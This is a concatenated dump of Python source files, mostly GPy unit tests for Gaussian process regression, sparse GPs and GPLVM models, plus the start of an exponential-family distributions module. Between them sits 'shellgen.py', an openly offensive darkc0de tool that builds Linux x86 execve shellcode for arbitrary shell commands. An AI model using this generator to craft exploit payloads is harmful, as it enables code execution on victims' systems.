np.testing.assert_almost_equal(np.diag(K_hat)[:, None], var)
np.testing.assert_almost_equal(mu_hat, mu)
def test_normalizer(self):
k = GPy.kern.RBF(1)
Y = self.Y
mu, std = Y.mean(0), Y.std(0)
m = GPy.models.GPRegression(self.X, Y, kernel=k, normalizer=True)
m.optimize(messages=True)
assert(m.checkgrad())
k = GPy.kern.RBF(1)
m2 = GPy.models.GPRegression(self.X, (Y-mu)/std, kernel=k, normalizer=False)
m2[:] = m[:]
mu1, var1 = m.predict(m.X, full_cov=True)
mu2, var2 = m2.predict(m2.X, full_cov=True)
np.testing.assert_allclose(mu1, (mu2*std)+mu)
np.testing.assert_allclose(var1, var2)
mu1, var1 = m.predict(m.X, full_cov=False)
mu2, var2 = m2.predict(m2.X, full_cov=False)
np.testing.assert_allclose(mu1, (mu2*std)+mu)
np.testing.assert_allclose(var1, var2)
q50n = m.predict_quantiles(m.X, (50,))
q50 = m2.predict_quantiles(m2.X, (50,))
np.testing.assert_allclose(q50n[0], (q50[0]*std)+mu)
def check_jacobian(self):
try:
import autograd.numpy as np, autograd as ag, GPy, matplotlib.pyplot as plt
from GPy.models import GradientChecker, GPRegression
except:
raise self.skipTest("autograd not available to check gradients")
def k(X, X2, alpha=1., lengthscale=None):
if lengthscale is None:
lengthscale = np.ones(X.shape[1])
exp = 0.
for q in range(X.shape[1]):
exp += ((X[:, [q]] - X2[:, [q]].T)/lengthscale[q])**2
#exp = np.sqrt(exp)
return alpha * np.exp(-.5*exp)
dk = ag.elementwise_grad(lambda x, x2: k(x, x2, alpha=ke.variance.values, lengthscale=ke.lengthscale.values))
dkdk = ag.elementwise_grad(dk, argnum=1)
ke = GPy.kern.RBF(1, ARD=True)
#ke.randomize()
ke.variance = .2#.randomize()
ke.lengthscale[:] = .5
ke.randomize()
X = np.linspace(-1, 1, 1000)[:,None]
X2 = np.array([[0.]]).T
np.testing.assert_allclose(ke.gradients_X([[1.]], X, X), dk(X, X))
np.testing.assert_allclose(ke.gradients_XX([[1.]], X, X).sum(0), dkdk(X, X))
np.testing.assert_allclose(ke.gradients_X([[1.]], X, X2), dk(X, X2))
np.testing.assert_allclose(ke.gradients_XX([[1.]], X, X2).sum(0), dkdk(X, X2))
m = GPRegression(self.X, self.Y)
def f(x):
m.X[:] = x
return m.log_likelihood()
def df(x):
m.X[:] = x
return m.kern.gradients_X(m.grad_dict['dL_dK'], X)
def ddf(x):
m.X[:] = x
return m.kern.gradients_XX(m.grad_dict['dL_dK'], X).sum(0)
gc = GradientChecker(f, df, self.X)
gc2 = GradientChecker(df, ddf, self.X)
assert(gc.checkgrad())
assert(gc2.checkgrad())
def test_predict_uncertain_inputs(self):
""" Projection of Gaussian through a linear function is still gaussian, and moments are analytical to compute, so we can check this case for predictions easily """
X = np.linspace(-5,5, 10)[:, None]
Y = 2*X + np.random.randn(*X.shape)*1e-3
m = GPy.models.BayesianGPLVM(Y, 1, X=X, kernel=GPy.kern.Linear(1), num_inducing=1)
m.Gaussian_noise[:] = 1e-4
m.X.mean[:] = X[:]
m.X.variance[:] = 1e-5
m.X.fix()
m.optimize()
X_pred_mu = np.random.randn(5, 1)
X_pred_var = np.random.rand(5, 1) + 1e-5
from GPy.core.parameterization.variational import NormalPosterior
X_pred = NormalPosterior(X_pred_mu, X_pred_var)
# mu = \int f(x)q(x|mu,S) dx = \int 2x.q(x|mu,S) dx = 2.mu
# S = \int (f(x) - m)^2q(x|mu,S) dx = \int f(x)^2 q(x) dx - mu**2 = 4(mu^2 + S) - (2.mu)^2 = 4S
Y_mu_true = 2*X_pred_mu
Y_var_true = 4*X_pred_var
Y_mu_pred, Y_var_pred = m.predict_noiseless(X_pred)
np.testing.assert_allclose(Y_mu_true, Y_mu_pred, rtol=1e-4)
np.testing.assert_allclose(Y_var_true, Y_var_pred, rtol=1e-4)
def test_sparse_raw_predict(self):
k = GPy.kern.RBF(1)
m = GPy.models.SparseGPRegression(self.X, self.Y, kernel=k)
m.randomize()
Z = m.Z[:]
# Not easy to check if woodbury_inv is correct in itself as it requires a large derivation and expression
Kinv = m.posterior.woodbury_inv
K_hat = k.K(self.X_new) - k.K(self.X_new, Z).dot(Kinv).dot(k.K(Z, self.X_new))
K_hat = np.clip(K_hat, 1e-15, np.inf)
mu, covar = m.predict_noiseless(self.X_new, full_cov=True)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(covar.shape, (self.N_new, self.N_new))
np.testing.assert_almost_equal(K_hat, covar)
# np.testing.assert_almost_equal(mu_hat, mu)
mu, var = m.predict_noiseless(self.X_new)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(var.shape, (self.N_new, 1))
np.testing.assert_almost_equal(np.diag(K_hat)[:, None], var)
# np.testing.assert_almost_equal(mu_hat, mu)
def test_likelihood_replicate(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[:] = m[''].values()
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[''] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.randomize()
m2[''] = m['']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.Gaussian_noise.randomize()
m2[:] = m[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m['.*var'] = 2
m2['.*var'] = m['.*var']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
def test_likelihood_set(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2.kern.lengthscale = m.kern.lengthscale
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2['.*lengthscale'] = m.kern.lengthscale
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2['.*lengthscale'] = m.kern['.*lengthscale']
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.lengthscale.randomize()
m2.kern.lengthscale = m.kern['.*lengthscale']
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
def test_missing_data(self):
from GPy import kern
from GPy.models.bayesian_gplvm_minibatch import BayesianGPLVMMiniBatch
from GPy.examples.dimensionality_reduction import _simulate_matern
D1, D2, D3, N, num_inducing, Q = 13, 5, 8, 400, 3, 4
_, _, Ylist = _simulate_matern(D1, D2, D3, N, num_inducing, False)
Y = Ylist[0]
inan = np.random.binomial(1, .9, size=Y.shape).astype(bool) # 80% missing data
Ymissing = Y.copy()
Ymissing[inan] = np.nan
k = kern.Linear(Q, ARD=True) + kern.White(Q, np.exp(-2)) # + kern.bias(Q)
m = BayesianGPLVMMiniBatch(Ymissing, Q, init="random", num_inducing=num_inducing,
kernel=k, missing_data=True)
assert(m.checkgrad())
mul, varl = m.predict(m.X)
k = kern.RBF(Q, ARD=True) + kern.White(Q, np.exp(-2)) # + kern.bias(Q)
m2 = BayesianGPLVMMiniBatch(Ymissing, Q, init="random", num_inducing=num_inducing,
kernel=k, missing_data=True)
assert(m.checkgrad())
m2.kern.rbf.lengthscale[:] = 1e6
m2.X[:] = m.X.param_array
m2.likelihood[:] = m.likelihood[:]
m2.kern.white[:] = m.kern.white[:]
mu, var = m.predict(m.X)
np.testing.assert_allclose(mul, mu)
np.testing.assert_allclose(varl, var)
q50 = m.predict_quantiles(m.X, (50,))
np.testing.assert_allclose(mul, q50[0])
def test_likelihood_replicate_kern(self):
m = GPy.models.GPRegression(self.X, self.Y)
m2 = GPy.models.GPRegression(self.X, self.Y)
np.testing.assert_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[''] = m.kern[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[:] = m.kern[:]
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[''] = m.kern['']
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
m.kern.randomize()
m2.kern[:] = m.kern[''].values()
np.testing.assert_almost_equal(m.log_likelihood(), m2.log_likelihood())
def test_big_model(self):
m = GPy.examples.dimensionality_reduction.mrd_simulation(optimize=0, plot=0, plot_sim=0)
m.X.fix()
print(m)
m.unfix()
m.checkgrad()
print(m)
m.fix()
print(m)
m.inducing_inputs.unfix()
print(m)
m.checkgrad()
m.unfix()
m.checkgrad()
m.checkgrad()
print(m)
def test_model_set_params(self):
m = GPy.models.GPRegression(self.X, self.Y)
lengthscale = np.random.uniform()
m.kern.lengthscale = lengthscale
np.testing.assert_equal(m.kern.lengthscale, lengthscale)
m.kern.lengthscale *= 1
m['.*var'] -= .1
np.testing.assert_equal(m.kern.lengthscale, lengthscale)
m.optimize()
print(m)
def test_model_updates(self):
Y1 = np.random.normal(0, 1, (40, 13))
Y2 = np.random.normal(0, 1, (40, 6))
m = GPy.models.MRD([Y1, Y2], 5)
self.count = 0
m.add_observer(self, self._count_updates, -2000)
m.update_model(False)
m['.*Gaussian'] = .001
self.assertEquals(self.count, 0)
m['.*Gaussian'].constrain_bounded(0,.01)
self.assertEquals(self.count, 0)
m.Z.fix()
self.assertEquals(self.count, 0)
m.update_model(True)
self.assertEquals(self.count, 1)
def _count_updates(self, me, which):
self.count+=1
def test_model_optimize(self):
X = np.random.uniform(-3., 3., (20, 1))
Y = np.sin(X) + np.random.randn(20, 1) * 0.05
m = GPy.models.GPRegression(X, Y)
m.optimize()
print(m)
def test_warped_gp_identity(self):
"""
A WarpedGP with the identity warping function should be
equal to a standard GP.
"""
k = GPy.kern.RBF(1)
m = GPy.models.GPRegression(self.X, self.Y, kernel=k)
m.optimize()
preds = m.predict(self.X)
warp_k = GPy.kern.RBF(1)
warp_f = GPy.util.warping_functions.IdentityFunction()
warp_m = GPy.models.WarpedGP(self.X, self.Y, kernel=warp_k, warping_function=warp_f)
warp_m.optimize()
warp_preds = warp_m.predict(self.X)
np.testing.assert_almost_equal(preds, warp_preds)
@unittest.skip('Comment this to plot the modified sine function')
def test_warped_gp_sine(self):
"""
A test replicating the sine regression problem from
Snelson's paper.
"""
X = (2 * np.pi) * np.random.random(151) - np.pi
Y = np.sin(X) + np.random.normal(0,0.1,151)
Y = np.exp(Y) - 5
#Y = np.array([np.power(abs(y),float(1)/3) * (1,-1)[y<0] for y in Y]) + 0
#np.seterr(over='raise')
import matplotlib.pyplot as plt
warp_k = GPy.kern.RBF(1)
warp_f = GPy.util.warping_functions.TanhWarpingFunction_d(n_terms=2)
warp_m = GPy.models.WarpedGP(X[:, None], Y[:, None], kernel=warp_k, warping_function=warp_f)
#warp_m['.*variance.*'].constrain_fixed(0.25)
#warp_m['.*lengthscale.*'].constrain_fixed(1)
#warp_m['warp_tanh.d'].constrain_fixed(1)
#warp_m.randomize()
#warp_m['.*warp_tanh.psi*'][:,0:2].constrain_bounded(0,100)
#warp_m['.*warp_tanh.psi*'][:,0:1].constrain_fixed(1)
#print(warp_m.checkgrad())
#warp_m.plot()
#plt.show()
warp_m.optimize_restarts(parallel=True, robust=True)
#print(warp_m.checkgrad())
print(warp_m)
print(warp_m['.*warp.*'])
warp_m.predict_in_warped_space = False
warp_m.plot()
warp_m.predict_in_warped_space = True
warp_m.plot()
warp_f.plot(X.min()-10, X.max()+10)
plt.show()
class GradientTests(np.testing.TestCase):
def setUp(self):
######################################
# # 1 dimensional example
# sample inputs and outputs
self.X1D = np.random.uniform(-3., 3., (20, 1))
self.Y1D = np.sin(self.X1D) + np.random.randn(20, 1) * 0.05
######################################
# # 2 dimensional example
# sample inputs and outputs
self.X2D = np.random.uniform(-3., 3., (40, 2))
self.Y2D = np.sin(self.X2D[:, 0:1]) * np.sin(self.X2D[:, 1:2]) + np.random.randn(40, 1) * 0.05
def check_model(self, kern, model_type='GPRegression', dimension=1, uncertain_inputs=False):
# Get the correct gradients
if dimension == 1:
X = self.X1D
Y = self.Y1D
else:
X = self.X2D
Y = self.Y2D
# Get model type (GPRegression, SparseGPRegression, etc)
model_fit = getattr(GPy.models, model_type)
# noise = GPy.kern.White(dimension)
kern = kern # + noise
if uncertain_inputs:
m = model_fit(X, Y, kernel=kern, X_variance=np.random.rand(X.shape[0], X.shape[1]))
else:
m = model_fit(X, Y, kernel=kern)
m.randomize()
# contrain all parameters to be positive
self.assertTrue(m.checkgrad())
def test_GPRegression_rbf_1d(self):
''' Testing the GP regression with rbf kernel with white kernel on 1d data '''
rbf = GPy.kern.RBF(1)
self.check_model(rbf, model_type='GPRegression', dimension=1)
def test_GPRegression_rbf_2D(self):
''' Testing the GP regression with rbf kernel on 2d data '''
rbf = GPy.kern.RBF(2)
self.check_model(rbf, model_type='GPRegression', dimension=2)
def test_GPRegression_rbf_ARD_2D(self):
''' Testing the GP regression with rbf kernel on 2d data '''
k = GPy.kern.RBF(2, ARD=True)
self.check_model(k, model_type='GPRegression', dimension=2)
def test_GPRegression_mlp_1d(self):
''' Testing the GP regression with mlp kernel with white kernel on 1d data '''
mlp = GPy.kern.MLP(1)
self.check_model(mlp, model_type='GPRegression', dimension=1)
# TODO:
# def test_GPRegression_poly_1d(self):
# ''' Testing the GP regression with polynomial kernel with white kernel on 1d data '''
# mlp = GPy.kern.Poly(1, degree=5)
# self.check_model(mlp, model_type='GPRegression', dimension=1)
def test_GPRegression_matern52_1D(self):
''' Testing the GP regression with matern52 kernel on 1d data '''
matern52 = GPy.kern.Matern52(1)
self.check_model(matern52, model_type='GPRegression', dimension=1)
def test_GPRegression_matern52_2D(self):
''' Testing the GP regression with matern52 kernel on 2d data '''
matern52 = GPy.kern.Matern52(2)
self.check_model(matern52, model_type='GPRegression', dimension=2)
def test_GPRegression_matern52_ARD_2D(self):
''' Testing the GP regression with matern52 kernel on 2d data '''
matern52 = GPy.kern.Matern52(2, ARD=True)
self.check_model(matern52, model_type='GPRegression', dimension=2)
def test_GPRegression_matern32_1D(self):
''' Testing the GP regression with matern32 kernel on 1d data '''
matern32 = GPy.kern.Matern32(1)
self.check_model(matern32, model_type='GPRegression', dimension=1)
def test_GPRegression_matern32_2D(self):
''' Testing the GP regression with matern32 kernel on 2d data '''
matern32 = GPy.kern.Matern32(2)
self.check_model(matern32, model_type='GPRegression', dimension=2)
def test_GPRegression_matern32_ARD_2D(self):
''' Testing the GP regression with matern32 kernel on 2d data '''
matern32 = GPy.kern.Matern32(2, ARD=True)
self.check_model(matern32, model_type='GPRegression', dimension=2)
def test_GPRegression_exponential_1D(self):
''' Testing the GP regression with exponential kernel on 1d data '''
exponential = GPy.kern.Exponential(1)
self.check_model(exponential, model_type='GPRegression', dimension=1)
def test_GPRegression_exponential_2D(self):
''' Testing the GP regression with exponential kernel on 2d data '''
exponential = GPy.kern.Exponential(2)
self.check_model(exponential, model_type='GPRegression', dimension=2)
def test_GPRegression_exponential_ARD_2D(self):
''' Testing the GP regression with exponential kernel on 2d data '''
exponential = GPy.kern.Exponential(2, ARD=True)
self.check_model(exponential, model_type='GPRegression', dimension=2)
def test_GPRegression_bias_kern_1D(self):
''' Testing the GP regression with bias kernel on 1d data '''
bias = GPy.kern.Bias(1)
self.check_model(bias, model_type='GPRegression', dimension=1)
def test_GPRegression_bias_kern_2D(self):
''' Testing the GP regression with bias kernel on 2d data '''
bias = GPy.kern.Bias(2)
self.check_model(bias, model_type='GPRegression', dimension=2)
def test_GPRegression_linear_kern_1D_ARD(self):
''' Testing the GP regression with linear kernel on 1d data '''
linear = GPy.kern.Linear(1, ARD=True)
self.check_model(linear, model_type='GPRegression', dimension=1)
def test_GPRegression_linear_kern_2D_ARD(self):
''' Testing the GP regression with linear kernel on 2d data '''
linear = GPy.kern.Linear(2, ARD=True)
self.check_model(linear, model_type='GPRegression', dimension=2)
def test_GPRegression_linear_kern_1D(self):
''' Testing the GP regression with linear kernel on 1d data '''
linear = GPy.kern.Linear(1)
self.check_model(linear, model_type='GPRegression', dimension=1)
def test_GPRegression_linear_kern_2D(self):
''' Testing the GP regression with linear kernel on 2d data '''
linear = GPy.kern.Linear(2)
self.check_model(linear, model_type='GPRegression', dimension=2)
def test_SparseGPRegression_rbf_white_kern_1d(self):
''' Testing the sparse GP regression with rbf kernel with white kernel on 1d data '''
rbf = GPy.kern.RBF(1)
self.check_model(rbf, model_type='SparseGPRegression', dimension=1)
def test_SparseGPRegression_rbf_white_kern_2D(self):
''' Testing the sparse GP regression with rbf kernel on 2d data '''
rbf = GPy.kern.RBF(2)
self.check_model(rbf, model_type='SparseGPRegression', dimension=2)
def test_SparseGPRegression_rbf_linear_white_kern_1D(self):
''' Testing the sparse GP regression with rbf kernel on 1d data '''
rbflin = GPy.kern.RBF(1) + GPy.kern.Linear(1) + GPy.kern.White(1, 1e-5)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=1)
def test_SparseGPRegression_rbf_linear_white_kern_2D(self):
''' Testing the sparse GP regression with rbf kernel on 2d data '''
rbflin = GPy.kern.RBF(2) + GPy.kern.Linear(2)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=2)
def test_SparseGPRegression_rbf_white_kern_2D_uncertain_inputs(self):
''' Testing the sparse GP regression with rbf, linear kernel on 2d data with uncertain inputs'''
rbflin = GPy.kern.RBF(2) + GPy.kern.White(2)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=2, uncertain_inputs=1)
def test_SparseGPRegression_rbf_white_kern_1D_uncertain_inputs(self):
''' Testing the sparse GP regression with rbf, linear kernel on 1d data with uncertain inputs'''
rbflin = GPy.kern.RBF(1) + GPy.kern.White(1)
self.check_model(rbflin, model_type='SparseGPRegression', dimension=1, uncertain_inputs=1)
def test_GPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05) + GPy.kern.Matern32(input_dim) + GPy.kern.Matern52(input_dim)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.GPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_SparseGPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05) + GPy.kern.Matern32(input_dim) + GPy.kern.Matern52(input_dim)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.SparseGPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_BCGPLVM_rbf_bias_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.RBF(input_dim, 0.5, 0.9 * np.ones((1,))) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.BCGPLVM(Y, input_dim, kernel=k)
self.assertTrue(m.checkgrad())
def test_GPLVM_rbf_linear_white_kern_2D(self):
""" Testing GPLVM with rbf + bias kernel """
N, input_dim, D = 50, 1, 2
X = np.random.rand(N, input_dim)
k = GPy.kern.Linear(input_dim) + GPy.kern.Bias(input_dim, 0.1) + GPy.kern.White(input_dim, 0.05)
K = k.K(X)
Y = np.random.multivariate_normal(np.zeros(N), K, input_dim).T
m = GPy.models.GPLVM(Y, input_dim, init='PCA', kernel=k)
self.assertTrue(m.checkgrad())
def test_GP_EP_probit(self):
N = 20
X = np.hstack([np.random.normal(5, 2, N / 2), np.random.normal(10, 2, N / 2)])[:, None]
Y = np.hstack([np.ones(N / 2), np.zeros(N / 2)])[:, None]
kernel = GPy.kern.RBF(1)
m = GPy.models.GPClassification(X, Y, kernel=kernel)
self.assertTrue(m.checkgrad())
def test_sparse_EP_DTC_probit(self):
N = 20
X = np.hstack([np.random.normal(5, 2, N / 2), np.random.normal(10, 2, N / 2)])[:, None]
Y = np.hstack([np.ones(N / 2), np.zeros(N / 2)])[:, None]
Z = np.linspace(0, 15, 4)[:, None]
kernel = GPy.kern.RBF(1)
m = GPy.models.SparseGPClassification(X, Y, kernel=kernel, Z=Z)
self.assertTrue(m.checkgrad())
def test_sparse_EP_DTC_probit_uncertain_inputs(self):
N = 20
X = np.hstack([np.random.normal(5, 2, N / 2), np.random.normal(10, 2, N / 2)])[:, None]
Y = np.hstack([np.ones(N / 2), np.zeros(N / 2)])[:, None]
Z = np.linspace(0, 15, 4)[:, None]
X_var = np.random.uniform(0.1, 0.2, X.shape)
kernel = GPy.kern.RBF(1)
m = GPy.models.SparseGPClassificationUncertainInput(X, X_var, Y, kernel=kernel, Z=Z)
self.assertTrue(m.checkgrad())
def test_multioutput_regression_1D(self):
X1 = np.random.rand(50, 1) * 8
X2 = np.random.rand(30, 1) * 5
X = np.vstack((X1, X2))
Y1 = np.sin(X1) + np.random.randn(*X1.shape) * 0.05
Y2 = -np.sin(X2) + np.random.randn(*X2.shape) * 0.05
Y = np.vstack((Y1, Y2))
k1 = GPy.kern.RBF(1)
m = GPy.models.GPCoregionalizedRegression(X_list=[X1, X2], Y_list=[Y1, Y2], kernel=k1)
#import ipdb;ipdb.set_trace()
#m.constrain_fixed('.*rbf_var', 1.)
self.assertTrue(m.checkgrad())
def test_multioutput_sparse_regression_1D(self):
X1 = np.random.rand(500, 1) * 8
X2 = np.random.rand(300, 1) * 5
X = np.vstack((X1, X2))
Y1 = np.sin(X1) + np.random.randn(*X1.shape) * 0.05
Y2 = -np.sin(X2) + np.random.randn(*X2.shape) * 0.05
Y = np.vstack((Y1, Y2))
k1 = GPy.kern.RBF(1)
m = GPy.models.SparseGPCoregionalizedRegression(X_list=[X1, X2], Y_list=[Y1, Y2], kernel=k1)
self.assertTrue(m.checkgrad())
def test_gp_heteroscedastic_regression(self):
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
m = GPy.models.GPHeteroscedasticRegression(X, Y, kern)
self.assertTrue(m.checkgrad())
def test_sparse_gp_heteroscedastic_regression(self):
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
Y_metadata = {'output_index':np.arange(num_obs)[:,None]}
noise_terms = np.unique(Y_metadata['output_index'].flatten())
likelihoods_list = [GPy.likelihoods.Gaussian(name="Gaussian_noise_%s" %j) for j in noise_terms]
likelihood = GPy.likelihoods.MixedNoise(likelihoods_list=likelihoods_list)
m = GPy.core.SparseGP(X, Y, X[np.random.choice(num_obs, 10)],
kern, likelihood,
inference_method=GPy.inference.latent_function_inference.VarDTC(),
Y_metadata=Y_metadata)
self.assertTrue(m.checkgrad())
def test_gp_kronecker_gaussian(self):
np.random.seed(0)
N1, N2 = 30, 20
X1 = np.random.randn(N1, 1)
X2 = np.random.randn(N2, 1)
X1.sort(0); X2.sort(0)
k1 = GPy.kern.RBF(1) # + GPy.kern.White(1)
k2 = GPy.kern.RBF(1) # + GPy.kern.White(1)
Y = np.random.randn(N1, N2)
Y = Y - Y.mean(0)
Y = Y / Y.std(0)
m = GPy.models.GPKroneckerGaussianRegression(X1, X2, Y, k1, k2)
# build the model the dumb way
assert (N1 * N2 < 1000), "too much data for standard GPs!"
yy, xx = np.meshgrid(X2, X1)
Xgrid = np.vstack((xx.flatten(order='F'), yy.flatten(order='F'))).T
kg = GPy.kern.RBF(1, active_dims=[0]) * GPy.kern.RBF(1, active_dims=[1])
mm = GPy.models.GPRegression(Xgrid, Y.reshape(-1, 1, order='F'), kernel=kg)
m.randomize()
mm[:] = m[:]
self.assertTrue(np.allclose(m.log_likelihood(), mm.log_likelihood()))
self.assertTrue(np.allclose(m.gradient, mm.gradient))
X1test = np.random.randn(100, 1)
X2test = np.random.randn(100, 1)
mean1, var1 = m.predict(X1test, X2test)
yy, xx = np.meshgrid(X2test, X1test)
Xgrid = np.vstack((xx.flatten(order='F'), yy.flatten(order='F'))).T
mean2, var2 = mm.predict(Xgrid)
self.assertTrue( np.allclose(mean1, mean2) )
self.assertTrue( np.allclose(var1, var2) )
def test_gp_VGPC(self):
np.random.seed(10)
num_obs = 25
X = np.random.randint(0, 140, num_obs)
X = X[:, None]
Y = 25. + np.sin(X / 20.) * 2. + np.random.rand(num_obs)[:, None]
kern = GPy.kern.Bias(1) + GPy.kern.RBF(1)
lik = GPy.likelihoods.Gaussian()
m = GPy.models.GPVariationalGaussianApproximation(X, Y, kernel=kern, likelihood=lik)
m.randomize()
self.assertTrue(m.checkgrad())
def test_ssgplvm(self):
from GPy import kern
from GPy.models import SSGPLVM
from GPy.examples.dimensionality_reduction import _simulate_matern
np.random.seed(10)
D1, D2, D3, N, num_inducing, Q = 13, 5, 8, 45, 3, 9
_, _, Ylist = _simulate_matern(D1, D2, D3, N, num_inducing, False)
Y = Ylist[0]
k = kern.Linear(Q, ARD=True) # + kern.white(Q, _np.exp(-2)) # + kern.bias(Q)
# k = kern.RBF(Q, ARD=True, lengthscale=10.)
m = SSGPLVM(Y, Q, init="rand", num_inducing=num_inducing, kernel=k, group_spike=True)
m.randomize()
self.assertTrue(m.checkgrad())
if __name__ == "__main__":
print("Running unit tests, please be (very) patient...")
unittest.main()
|
avehtari/GPy
|
GPy/testing/model_tests.py
|
Python
|
bsd-3-clause
| 32,449
|
[
"Gaussian"
] |
4ade88958a901bc853d5b63225a12cd120f2b7cd3fb5570b0cb4558638da19a8
|
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
#Greetz to all darkc0de and Zone-Hacker member
#Shoutz to d3hydr8,lowlz,p47r1ck,r45c4l,smith,dalsim,baltazar
#Original Idea took from Milw0rm (Thanks Str0ke)
import sys,os,string
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
os.system(SysCls)
print "\n|---------------------------------------------------------------|"
print "| beenudel1986[@]gmail[dot]com |"
print "| Command Execution Shell Generator(linux) |"
print "| 17/2009 shellgen.py |"
print "| Do Visit www.BeenuArora.com & darkc0de.com |"
print "| Generates Shell Code for system Commands |"
print "|---------------------------------------------------------------|\n"
if len(sys.argv) < 2:
print "\nUsage: ./shellgen.py <command>"
print "Ex: ./shellgen.py ls\n"
sys.exit(1)
command=sys.argv[1]
code ="\\x60\\x31\\xc0\\x31\\xd2\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x68\\x2d\\x63\\x63\\x63 \\x89\\xe1\\x52\\xeb\\x07\\x51\\x53\\x89\\xe1\\xcd\\x80\\x61\\xe8\\xf4\\xff\\xff\\xff"
for payload in command:
hexshell=hex( ord(payload))
attachshell="\\"+hexshell[1:]
code+=attachshell
print "\n Generated Shell. \n"
print code
|
knightmare2600/d4rkc0de
|
others/shellgen.py
|
Python
|
gpl-2.0
| 2,341
|
[
"VisIt"
] |
324e1c398760a9f8382b08a0e9e6ec7a02dde6d53ac1787b22d217e9eb6bda8b
|
'''
A suite of common exponential family distributions.
'''
import numpy as np
import scipy.sparse as sps
from scipy.special import psi, polygamma, gammaln, gammasgn
from copy import deepcopy
from utils import pretty_str, safe_exp, safe_sq
import csv
def get_node(name):
if name == 'bernoulli' or name == 'b':
return Bernoulli()
if name == 'gaussian' or name == 'normal' or name == 'n':
return Gaussian()
if name == 'gamma' or name == 'g':
return Gamma()
if name.startswith('dirichlet') or name.startswith('d') or name.startswith('dir'):
num_params = int(name.replace('dirichlet', '').replace('dir', '').replace('d',''))
return Dirichlet(num_params)
if name.startswith('zi') or name.startswith('zeroinflated'):
name = name[len('zi'):] if name.startswith('zi') else name[len('zeroinflated'):]
return ZeroInflated(get_node(name))
def get_node_from_file(target, filename):
with open(filename, 'rb') as f:
reader = csv.reader(f)
line = reader.next()
return get_node(line[target])
def load_nodes(filename):
with open(filename, 'rb') as f:
reader = csv.reader(f)
return [get_node(x) for x in reader.next()]
def save_nodes(nodes, filename):
with open(filename, 'wb') as f:
writer = csv.writer(f)
writer.writerow(nodes)
class ExponentialFamily:
def log_likelihood(self, eta, x):
if sps.issparse(x):
# CSC format
